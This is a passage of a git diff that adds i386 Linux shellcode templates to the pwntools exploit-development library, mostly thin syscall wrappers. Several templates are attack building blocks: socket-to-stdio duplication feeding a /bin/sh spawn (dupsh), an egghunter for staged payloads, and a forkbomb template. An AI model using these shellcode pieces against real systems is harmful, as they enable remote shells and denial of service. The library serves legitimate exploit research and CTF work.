fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dupio.asm b/pwnlib/shellcraft/templates/i386/linux/dupio.asm new file mode 100644 index 000000000..2f12a95d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/dupio.asm @@ -0,0 +1,21 @@ +<% from pwnlib.shellcraft.i386.linux import dup2 %> +<% from pwnlib.shellcraft.i386 import mov %> +<% from pwnlib.shellcraft import common %> +<%page args="sock = 'ebp'"/> +<%docstring> +Args: [sock (imm/reg) = ebp] + Duplicates sock to stdin, stdout and stderr + +<% + dup = common.label("dup") + looplabel = common.label("loop") +%> + +${dup}: + ${mov('ebx', sock)} + ${mov('ecx', 3)} +${looplabel}: + dec ecx + + ${dup2('ebx', 'ecx')} + jnz ${looplabel} diff --git a/pwnlib/shellcraft/templates/i386/linux/dupsh.asm b/pwnlib/shellcraft/templates/i386/linux/dupsh.asm index 583e6daac..7be47ecbf 100644 --- a/pwnlib/shellcraft/templates/i386/linux/dupsh.asm +++ b/pwnlib/shellcraft/templates/i386/linux/dupsh.asm @@ -7,6 +7,6 @@ Args: [sock (imm/reg) = ebp] -${linux.dup(sock)} +${linux.dupio(sock)} ${linux.sh()} diff --git a/pwnlib/shellcraft/templates/i386/linux/echo.asm b/pwnlib/shellcraft/templates/i386/linux/echo.asm index 8b6256d42..62e998b88 100644 --- a/pwnlib/shellcraft/templates/i386/linux/echo.asm +++ b/pwnlib/shellcraft/templates/i386/linux/echo.asm @@ -1,5 +1,5 @@ <% from pwnlib.shellcraft import i386 %> -<%page args="string, sock = 'ebp'"/> +<%page args="string, sock = '1'"/> <%docstring> Writes a string to a file descriptor diff --git a/pwnlib/shellcraft/templates/i386/linux/egghunter.asm b/pwnlib/shellcraft/templates/i386/linux/egghunter.asm new file mode 100644 index 000000000..663db7bf2 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/egghunter.asm @@ -0,0 +1,73 @@ +<% +from pwnlib.shellcraft import i386, pretty, common +from pwnlib.util.packing import pack, unpack +from pwnlib.util.lists import group +from pwnlib import constants, log +%> +<%page args="egg, start_address = 0"/> +<%docstring> +egghunter(egg, start_address = 0) + +Searches memory for the byte sequence 'egg'. + +Return value is the address immediately following the match, +stored in RDI. + +Arguments: + egg(str, int): String of bytes, or word-size integer to search for + start_address(int): Where to start the search + +<% +egghunter_loop = common.label('egghunter_loop') +memcmp = common.label('egghunter_memcmp') +done = common.label('egghunter_done') +next_page = common.label('egghunter_nextpage') + +egg_str = egg +if isinstance(egg, int): + egg_str = pack(egg) + +if len(egg_str) % 4: + log = log.getLogger('pwnlib.shellcraft.templates.i386.linux.egghunter') + log.error("Egg size must be a multiple of four bytes") +%> + cld + ${i386.pushstr(egg_str, False)} +% if start_address: + ${i386.mov('ebx', start_address)} +% endif + +## Search for pages +${egghunter_loop}: + ${i386.linux.access('ebx', 0)} + +## EFAULT == Bad address + cmp al, (-${pretty(constants.EFAULT)}) & 0xff + jz ${next_page} + +## We found a page, scan all of the DWORDs + ${i386.mov('edx', 0x1000/4)} +${memcmp}: + test edx, edx + jz ${next_page} + +## Scan forward by DWORD + ${i386.setregs({'esi':'esp', + 'edi':'ebx', + 'ecx': len(egg_str)/4})} +## Success? + repe cmpsd + jz ${done} + +## Increment the starting point, decement the counter, restart + add ebx, 4 + dec edx + jnz ${memcmp} + +${next_page}: +## Next page + or bx, 0xfff + inc ebx + jmp ${egghunter_loop} +${done}: + diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_create.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_create.asm new file mode 100644 index 000000000..7d457e7e5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_create1.asm new file mode 100644 index 000000000..0b567667a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_ctl.asm new file mode 100644 index 000000000..68ead556a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_pwait.asm new file mode 100644 index 000000000..f20e57940 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_pwait.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/i386/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/i386/linux/epoll_wait.asm new file mode 100644 index 000000000..8dc679447 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/execve.asm b/pwnlib/shellcraft/templates/i386/linux/execve.asm new file mode 100644 index 000000000..66c1d79fe --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/execve.asm @@ -0,0 +1,47 @@ +<% +from pwnlib.shellcraft import i386, registers +from pwnlib.abi import linux_i386_syscall as abi +%> +<%docstring> +Execute a different process. + +Attempts to perform some automatic detection of types. +Otherwise, the arguments behave as normal. + +- If ``path`` is a string that is not a known register, + it is pushed onto the stack. +- If ``argv`` is an array of strings, it is pushed onto + the stack, and NULL-terminated. +- If ``envp`` is an dictionary of {string:string}, + it is pushed onto the stack, and NULL-terminated. + +Example: + + >>> path = '/bin/sh' + >>> argv = ['sh', '-c', 'echo Hello, $NAME; exit $STATUS'] + >>> envp = {'NAME': 'zerocool', 'STATUS': 3} + >>> sc = shellcraft.i386.linux.execve(path, argv, envp) + >>> io = run_assembly(sc) + >>> io.recvall() + 'Hello, zerocool\n' + >>> io.poll(True) + 3 + +<%page args="path = '/bin///sh', argv=0, envp=0"/> +<% +if isinstance(envp, dict): + envp = ['%s=%s' % (k,v) for (k,v) in envp.items()] +%> +% if isinstance(argv, (list, tuple)): + ${i386.pushstr_array(abi.register_arguments[3], argv)} + <% argv = abi.register_arguments[3] %> +% endif +% if isinstance(envp, (list, tuple)): + ${i386.pushstr_array(abi.register_arguments[2], envp)} + <% envp = abi.register_arguments[2] %> +% endif +% if isinstance(path, str) and not registers.is_register(path): + ${i386.pushstr(path)} + <% path = 'esp' %> +%endif + ${i386.syscall('SYS_execve', path, argv, envp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/faccessat.asm b/pwnlib/shellcraft/templates/i386/linux/faccessat.asm new file mode 100644 index 000000000..1cec1edc5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/faccessat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fallocate.asm b/pwnlib/shellcraft/templates/i386/linux/fallocate.asm new file mode 100644 index 000000000..f5acebb02 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fchdir.asm b/pwnlib/shellcraft/templates/i386/linux/fchdir.asm new file mode 100644 index 000000000..8ad88495d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fchmod.asm b/pwnlib/shellcraft/templates/i386/linux/fchmod.asm new file mode 100644 index 000000000..c1ba15b9b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fchmodat.asm b/pwnlib/shellcraft/templates/i386/linux/fchmodat.asm new file mode 100644 index 000000000..1353a255e --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fchown.asm b/pwnlib/shellcraft/templates/i386/linux/fchown.asm new file mode 100644 index 000000000..0fd1f4635 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fchownat.asm b/pwnlib/shellcraft/templates/i386/linux/fchownat.asm new file mode 100644 index 000000000..5e5dd1662 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fcntl.asm b/pwnlib/shellcraft/templates/i386/linux/fcntl.asm new file mode 100644 index 000000000..71ec83e64 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fdatasync.asm b/pwnlib/shellcraft/templates/i386/linux/fdatasync.asm new file mode 100644 index 000000000..89e7f3e11 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/i386/linux/flock.asm b/pwnlib/shellcraft/templates/i386/linux/flock.asm new file mode 100644 index 000000000..da4d5c942 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fork.asm b/pwnlib/shellcraft/templates/i386/linux/fork.asm new file mode 100644 index 000000000..008d9eca2 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/i386/linux/forkbomb.asm b/pwnlib/shellcraft/templates/i386/linux/forkbomb.asm new file mode 100644 index 000000000..7aeb1bc4c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/forkbomb.asm @@ -0,0 +1,13 @@ +<% + from pwnlib.shellcraft.i386.linux import fork + from pwnlib.shellcraft.common import label +%> +<%docstring> +Performs a forkbomb attack. + +<% + dosloop = label('fork_bomb') +%> +${dosloop}: + ${fork()} + jmp ${dosloop} diff --git a/pwnlib/shellcraft/templates/i386/linux/forkexit.asm b/pwnlib/shellcraft/templates/i386/linux/forkexit.asm new file mode 100644 index 000000000..f7c02117f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/forkexit.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft.i386.linux import fork, exit +%> +<%page args=""/> +<%docstring> +Attempts to fork. If the fork is successful, the parent exits. + +<% +dont_exit = common.label('forkexit') +%> + ${fork()} + cmp eax, 1 + jl ${dont_exit} + ${exit(0)} +${dont_exit}: diff --git a/pwnlib/shellcraft/templates/i386/linux/fstat.asm b/pwnlib/shellcraft/templates/i386/linux/fstat.asm new file mode 100644 index 000000000..ff0062115 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fstat64.asm b/pwnlib/shellcraft/templates/i386/linux/fstat64.asm new file mode 100644 index 000000000..f2b721613 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fstatat64.asm b/pwnlib/shellcraft/templates/i386/linux/fstatat64.asm new file mode 100644 index 000000000..f1cab0ebb --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fsync.asm b/pwnlib/shellcraft/templates/i386/linux/fsync.asm new file mode 100644 index 000000000..c458209ce --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ftruncate.asm b/pwnlib/shellcraft/templates/i386/linux/ftruncate.asm new file mode 100644 index 000000000..9bea9bd9d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/i386/linux/ftruncate64.asm new file mode 100644 index 000000000..848f8f556 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/i386/linux/futimesat.asm b/pwnlib/shellcraft/templates/i386/linux/futimesat.asm new file mode 100644 index 000000000..b7ee27027 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getcwd.asm b/pwnlib/shellcraft/templates/i386/linux/getcwd.asm new file mode 100644 index 000000000..11f41e22f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getdents.asm b/pwnlib/shellcraft/templates/i386/linux/getdents.asm index 2815f989d..c8e18935e 100644 --- a/pwnlib/shellcraft/templates/i386/linux/getdents.asm +++ b/pwnlib/shellcraft/templates/i386/linux/getdents.asm @@ -1,23 +1,14 @@ -<% from pwnlib.shellcraft import i386 %> -<%page args="in_fd = 'ebp', size = 255, allocate_stack = True"/> -<%docstring> Reads to the stack from a directory. +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, dirp, count"/> +<%docstring> +Invokes the syscall getdents. See 'man 2 getdents' for more information. -Args: - in_fd (int/str): File descriptor to be read from. - size (int): Buffer size. - allocate_stack (bool): allocate 'size' bytes on the stack. - -You can optioanlly shave a few bytes not allocating the stack space. - -The size read is left in eax. +Arguments: + fd(int): fd + dirp(int): dirp + count(int): count - ${i386.mov('ebx', in_fd)} - xor eax, eax - mov al, SYS_getdents - cdq - ${i386.mov('dl', size)} -%if allocate_stack: - sub esp, edx -%endif - mov ecx, esp - int 0x80 + + ${syscall('SYS_getdents', fd, dirp, count)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getegid.asm b/pwnlib/shellcraft/templates/i386/linux/getegid.asm new file mode 100644 index 000000000..a064f2abc --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/i386/linux/geteuid.asm b/pwnlib/shellcraft/templates/i386/linux/geteuid.asm new file mode 100644 index 000000000..b204c7953 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/i386/linux/getgid.asm b/pwnlib/shellcraft/templates/i386/linux/getgid.asm new file mode 100644 index 000000000..bd9ff7f92 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/i386/linux/getgroups.asm b/pwnlib/shellcraft/templates/i386/linux/getgroups.asm new file mode 100644 index 000000000..436bbb866 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getitimer.asm b/pwnlib/shellcraft/templates/i386/linux/getitimer.asm new file mode 100644 index 000000000..df30e218c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getpeername.asm b/pwnlib/shellcraft/templates/i386/linux/getpeername.asm new file mode 100644 index 000000000..eeaa92dda --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getpgid.asm b/pwnlib/shellcraft/templates/i386/linux/getpgid.asm new file mode 100644 index 000000000..d814ad5f3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getpgrp.asm b/pwnlib/shellcraft/templates/i386/linux/getpgrp.asm new file mode 100644 index 000000000..91eabdde9 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/i386/linux/getpid.asm b/pwnlib/shellcraft/templates/i386/linux/getpid.asm new file mode 100644 index 000000000..5195d77a4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getpid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/i386/linux/getpmsg.asm b/pwnlib/shellcraft/templates/i386/linux/getpmsg.asm new file mode 100644 index 000000000..232f0b623 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getppid.asm b/pwnlib/shellcraft/templates/i386/linux/getppid.asm new file mode 100644 index 000000000..b227dddba --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/i386/linux/getpriority.asm b/pwnlib/shellcraft/templates/i386/linux/getpriority.asm new file mode 100644 index 000000000..c209a8615 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getresgid.asm b/pwnlib/shellcraft/templates/i386/linux/getresgid.asm new file mode 100644 index 000000000..a30ac1f13 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getresuid.asm b/pwnlib/shellcraft/templates/i386/linux/getresuid.asm new file mode 100644 index 000000000..06c0d955a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getrlimit.asm b/pwnlib/shellcraft/templates/i386/linux/getrlimit.asm new file mode 100644 index 000000000..0074c5983 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getrusage.asm b/pwnlib/shellcraft/templates/i386/linux/getrusage.asm new file mode 100644 index 000000000..7976b8ef3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getsid.asm b/pwnlib/shellcraft/templates/i386/linux/getsid.asm new file mode 100644 index 000000000..a8c2580e1 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. 